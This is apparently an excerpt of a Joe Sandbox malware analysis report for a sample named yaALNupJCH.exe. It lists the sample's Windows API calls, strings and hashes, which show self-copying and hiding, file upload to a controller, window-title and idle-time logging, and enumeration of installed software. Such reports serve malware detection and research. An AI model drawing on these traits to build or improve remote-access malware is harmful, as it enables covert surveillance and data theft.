                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\yaALNupJCH.exe,00000000,00000000), ref: 0040CED2
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CF11
                                                                                                • _wcslen.LIBCMT ref: 0040CF14
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CF2B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040CF7B
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040CF99
                                                                                                • ExitProcess.KERNEL32 ref: 0040CFB0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                • String ID: 6$C:\Users\user\Desktop\yaALNupJCH.exe$del$open
                                                                                                • API String ID: 1579085052-1230562670
                                                                                                • Opcode ID: d7e0deb7c1df92f36f4db919fc40f4064fea54d51c41b90f377997a553d1487b
                                                                                                • Instruction ID: 4aa6f52345204f9d3ba8f621bb5a02f3c2425994bcf3c33b54a52c403d9a3db8
                                                                                                • Opcode Fuzzy Hash: d7e0deb7c1df92f36f4db919fc40f4064fea54d51c41b90f377997a553d1487b
                                                                                                • Instruction Fuzzy Hash: BB51E560208301ABD609B726DC92E7F679D9F84719F10443FF609A62E3EF7C9D04866E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041BF84
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0041BF9C
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041BFB5
                                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041BFF0
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C003
                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C047
                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C062
                                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C07A
                                                                                                • _wcslen.LIBCMT ref: 0041C089
                                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041C0A9
                                                                                                • GetLastError.KERNEL32 ref: 0041C0C1
                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C0EE
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041C107
                                                                                                • lstrcpyW.KERNEL32 ref: 0041C116
                                                                                                • GetLastError.KERNEL32 ref: 0041C11E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                • String ID: ?
                                                                                                • API String ID: 3941738427-1684325040
                                                                                                • Opcode ID: 715a33eef8a2faa7816bc5fce87db8e969b2932189cd6cfa065d3aae50eb1d12
                                                                                                • Instruction ID: ebba18ca6bfbe9900a9076ea91f3c8992c365883813dc3c2e4c5b1ddc1dd106d
                                                                                                • Opcode Fuzzy Hash: 715a33eef8a2faa7816bc5fce87db8e969b2932189cd6cfa065d3aae50eb1d12
                                                                                                • Instruction Fuzzy Hash: 7B416171544306EBD720DFA0DC88ADB7BECAF48355F10092BF545C2261EB78C988CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                • String ID:
                                                                                                • API String ID: 3899193279-0
                                                                                                • Opcode ID: e59a5d4720be3735c3583ecc21b3002b3d05f929497f546d3460778b80b6eaf5
                                                                                                • Instruction ID: 8bf2c607ebde511f1b434109d64c34b6cdbb8d28cf40a594a9c763835df0f646
                                                                                                • Opcode Fuzzy Hash: e59a5d4720be3735c3583ecc21b3002b3d05f929497f546d3460778b80b6eaf5
                                                                                                • Instruction Fuzzy Hash: 9DD13771D003006FFB24AF759D42A6B77A8EF01354F16417FE905A7382EA3D990A8B5D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412A1B
                                                                                                  • Part of subcall function 0041B8C6: GetCurrentProcessId.KERNEL32(00000000,7782FBB0,00000000,?,?,?,?,00466468,0040D15B,.vbs,?,?,?,?,?,004752F0), ref: 0041B8ED
                                                                                                  • Part of subcall function 004184B6: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 004184CC
                                                                                                  • Part of subcall function 004184B6: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 004184D5
                                                                                                • Sleep.KERNEL32(0000000A,00465E74), ref: 00412B6D
                                                                                                • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412C0F
                                                                                                • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412CB1
                                                                                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412D13
                                                                                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412D4A
                                                                                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412D86
                                                                                                • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412DA0
                                                                                                • Sleep.KERNEL32(00000064), ref: 00412DE2
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                • API String ID: 1223786279-2576077980
                                                                                                • Opcode ID: 979841e0768e4e9b6a1fdcaa430d89e1a82e99aac13d4eb410628141a9d0f94e
                                                                                                • Instruction ID: a1c1eebc7225e2a3af2bf9f674dd4b331a6a22bbf8d2d11b3d3d95dca56a63f0
                                                                                                • Opcode Fuzzy Hash: 979841e0768e4e9b6a1fdcaa430d89e1a82e99aac13d4eb410628141a9d0f94e
                                                                                                • Instruction Fuzzy Hash: E70256315083415AC325FB22D891AEFB3E5AFD4348F50483EF58A931E2EF78598DC64A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00414D23
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414D65
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414D85
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414D8C
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414DC4
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414DD6
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414DDD
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414DEC
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E03
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                • API String ID: 2490988753-744132762
                                                                                                • Opcode ID: 8bee0785508e6c960bcbf0281b12361e544454b7fefe14523764ee1ecffa666c
                                                                                                • Instruction ID: 871d15ce04c65df1b42d9b9bb68fd0349182852438c0ab10db097056de8955f1
                                                                                                • Opcode Fuzzy Hash: 8bee0785508e6c960bcbf0281b12361e544454b7fefe14523764ee1ecffa666c
                                                                                                • Instruction Fuzzy Hash: 6F31D3B1A01315ABC720AB65DC84EDFB7DCAF84754F40092BF85893211E778D9858AEE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C5FF
                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 0041C643
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0041C90D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnumOpen
                                                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                • API String ID: 1332880857-3714951968
                                                                                                • Opcode ID: 253e9a839a2d3a9543dcebbd2a5c8e5dff626512c864a7405e8cfc213360fc2c
                                                                                                • Instruction ID: b4b41d76fea16dc8d6548a96d897c20ecb83427c766ff7297069692ec6cda10a
                                                                                                • Opcode Fuzzy Hash: 253e9a839a2d3a9543dcebbd2a5c8e5dff626512c864a7405e8cfc213360fc2c
                                                                                                • Instruction Fuzzy Hash: 838154311082459BC325EF11D851EEFB7E8BF94309F10482FB589921A1FF34AA49CA5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040AC86
                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040AC91
                                                                                                • GetForegroundWindow.USER32 ref: 0040AC97
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040ACA0
                                                                                                • GetWindowTextW.USER32 ref: 0040ACD4
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0040ADA2
                                                                                                  • Part of subcall function 0040A584: SetEvent.KERNEL32(?,?,00000000,0040B158,00000000), ref: 0040A5B0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                • String ID: [${ User has been idle for $ minutes }$]$lG$lG$lG
                                                                                                • API String ID: 911427763-790354841
                                                                                                • Opcode ID: 690bf1f7550bafbcfa9a4fa22f376934340438e36a94d4c2ee60a085dd43089b
                                                                                                • Instruction ID: a6336e939aeddfcf0e53b46632b03f7586de99f06c4f75a03a301e66baf156ba
                                                                                                • Opcode Fuzzy Hash: 690bf1f7550bafbcfa9a4fa22f376934340438e36a94d4c2ee60a085dd43089b
                                                                                                • Instruction Fuzzy Hash: 145190716043409BD314FB31D856AAE77A6AF84308F40093FF586A22E2EF7C9955C69F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D528
                                                                                                • GetCursorPos.USER32(?), ref: 0041D537
                                                                                                • SetForegroundWindow.USER32(?), ref: 0041D540
                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D55A
                                                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D5AB
                                                                                                • ExitProcess.KERNEL32 ref: 0041D5B3
                                                                                                • CreatePopupMenu.USER32 ref: 0041D5B9
                                                                                                • AppendMenuA.USER32 ref: 0041D5CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                • String ID: Close
                                                                                                • API String ID: 1657328048-3535843008
                                                                                                • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                                • Instruction ID: e2a929e8b8d8ae91c23b191118bc4d50e56676cab0c381e7b4c0254b0064898e
                                                                                                • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                                • Instruction Fuzzy Hash: D22119B1544209FFDB094F64ED0EAAA3F76FB08306F004125F506951B2DB75DEA1EB29
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00CE4738,00000FA0,?,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC243D
                                                                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC2448
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC2459
                                                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CC246B
                                                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CC2479
                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC249C
                                                                                                • ___scrt_fastfail.LIBCMT ref: 00CC24AD
                                                                                                • DeleteCriticalSection.KERNEL32(00CE4738,00000007,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC24B8
                                                                                                • CloseHandle.KERNEL32(00000000,?,00CC240F,?,00CE16E8,?,?,?,?), ref: 00CC24C8
                                                                                                Strings
                                                                                                • SleepConditionVariableCS, xrefs: 00CC2465
                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CC2443
                                                                                                • WakeAllConditionVariable, xrefs: 00CC2471
                                                                                                • kernel32.dll, xrefs: 00CC2454
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                • API String ID: 3578986977-3242537097
                                                                                                • Opcode ID: e487b38f40500e2771242b12eb87cec7874294caed9f7d35c34c5e4f90b3b6d2
                                                                                                • Instruction ID: 3ae962a23ef8da906a439594d5df81c74f5a7ac162bba0cf1d5cb3418f1c84f3
                                                                                                • Opcode Fuzzy Hash: e487b38f40500e2771242b12eb87cec7874294caed9f7d35c34c5e4f90b3b6d2
                                                                                                • Instruction Fuzzy Hash: D701DF71A42711ABC728AF75FD0EF2E37E9EB85B50B05002AF911D6250EB74C940CAB2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: 5389e19cd8074467722e87e13c63451ee21fb00145f5e1c4a4ed7b29eb800e90
                                                                                                • Instruction ID: 35b30c28121b6b0c9a6e456b1157ba059d574d411cc2403bfcf1dfeedd9c98fb
                                                                                                • Opcode Fuzzy Hash: 5389e19cd8074467722e87e13c63451ee21fb00145f5e1c4a4ed7b29eb800e90
                                                                                                • Instruction Fuzzy Hash: ECB1CE71900605AFEF10DF69C881BEEBBB5BF08304F24402EF994A7342DB799945CB69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                                                                • __aulldiv.LIBCMT ref: 00408D4D
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                • API String ID: 3086580692-2582957567
                                                                                                • Opcode ID: 427d2a644fcf572750d78cadef3739e3e7f58da9a0c79bc12abacaf3f5ed2758
                                                                                                • Instruction ID: 9a9de3c1f97d4aeb1c15f1b9dcb3f5412df516a05423aabf9feb9beab6c98786
                                                                                                • Opcode Fuzzy Hash: 427d2a644fcf572750d78cadef3739e3e7f58da9a0c79bc12abacaf3f5ed2758
                                                                                                • Instruction Fuzzy Hash: 88B192316083409BC314FB26C992AAFB7E5AFC4354F40492FF589622D1EF789945CB8B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00001388), ref: 0040A68E
                                                                                                  • Part of subcall function 0040A5C3: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A69B), ref: 0040A5F9
                                                                                                  • Part of subcall function 0040A5C3: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A69B), ref: 0040A608
                                                                                                  • Part of subcall function 0040A5C3: Sleep.KERNEL32(00002710,?,?,?,0040A69B), ref: 0040A635
                                                                                                  • Part of subcall function 0040A5C3: CloseHandle.KERNEL32(00000000,?,?,?,0040A69B), ref: 0040A63C
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A6CA
                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A6DB
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A6F2
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A76C
                                                                                                  • Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A791), ref: 0041C3EC
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A875
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                • API String ID: 3795512280-1152054767
                                                                                                • Opcode ID: 6fe2898c7a098da1e411ac960d19b54830d1cd1166583224f82eb58c1664eb67
                                                                                                • Instruction ID: cf95c0dacd67fb8131f25f5cd09860d96f75af0bde8ca3c14b7674e5c1903afd
                                                                                                • Opcode Fuzzy Hash: 6fe2898c7a098da1e411ac960d19b54830d1cd1166583224f82eb58c1664eb67
                                                                                                • Instruction Fuzzy Hash: 4C517E716043055ACB05BB32C866ABE77AA5F80349F40483FB682B71E2DF7C9909865E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 0045124B
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 00450460
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 00450472
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 00450484
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 00450496
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 004504A8
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 004504BA
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 004504CC
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 004504DE
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 004504F0
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 00450502
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 00450514
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 00450526
                                                                                                  • Part of subcall function 00450443: _free.LIBCMT ref: 00450538
                                                                                                • _free.LIBCMT ref: 00451240
                                                                                                  • Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
                                                                                                  • Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A
                                                                                                • _free.LIBCMT ref: 00451262
                                                                                                • _free.LIBCMT ref: 00451277
                                                                                                • _free.LIBCMT ref: 00451282
                                                                                                • _free.LIBCMT ref: 004512A4
                                                                                                • _free.LIBCMT ref: 004512B7
                                                                                                • _free.LIBCMT ref: 004512C5
                                                                                                • _free.LIBCMT ref: 004512D0
                                                                                                • _free.LIBCMT ref: 00451308
                                                                                                • _free.LIBCMT ref: 0045130F
                                                                                                • _free.LIBCMT ref: 0045132C
                                                                                                • _free.LIBCMT ref: 00451344
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 2f1d87d0e257826117984e37254ff410fc3e82beb909631ef58ecd84ed80cd16
                                                                                                • Instruction ID: c063d82046dfb7db7ea77a1ca71dc0387125a27f9d9c771daae3e06cc2a2942d
                                                                                                • Opcode Fuzzy Hash: 2f1d87d0e257826117984e37254ff410fc3e82beb909631ef58ecd84ed80cd16
                                                                                                • Instruction Fuzzy Hash: DC315E31504301AEEB20AA7AD856B5773E8AF01315F26856FFC48D7262DF38AC44CB1D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 00CCD638
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD1EE
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD200
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD212
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD224
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD236
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD248
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD25A
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD26C
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD27E
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD290
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2A2
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2B4
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2C6
                                                                                                • _free.LIBCMT ref: 00CCD62D
                                                                                                  • Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CC7A83), ref: 00CC8967
                                                                                                  • Part of subcall function 00CC8951: GetLastError.KERNEL32(?,?,00CC7A83), ref: 00CC8979
                                                                                                • _free.LIBCMT ref: 00CCD64F
                                                                                                • _free.LIBCMT ref: 00CCD664
                                                                                                • _free.LIBCMT ref: 00CCD66F
                                                                                                • _free.LIBCMT ref: 00CCD691
                                                                                                • _free.LIBCMT ref: 00CCD6A4
                                                                                                • _free.LIBCMT ref: 00CCD6B2
                                                                                                • _free.LIBCMT ref: 00CCD6BD
                                                                                                • _free.LIBCMT ref: 00CCD6F5
                                                                                                • _free.LIBCMT ref: 00CCD6FC
                                                                                                • _free.LIBCMT ref: 00CCD719
                                                                                                • _free.LIBCMT ref: 00CCD731
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: e2069f1e58a866e4cd5eeac30d1c3846d4e2bf7da74960a08ee496cea153efa8
                                                                                                • Instruction ID: ef8e33214b20f5c50c407ec465469dcd56e5f12e4de300c2e5897a8a8fa355f1
                                                                                                • Opcode Fuzzy Hash: e2069f1e58a866e4cd5eeac30d1c3846d4e2bf7da74960a08ee496cea153efa8
                                                                                                • Instruction Fuzzy Hash: 8B316C716047059FEB21AA79D885F6B73E8AF40350F10492DF06AD7191DF30EE85DB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
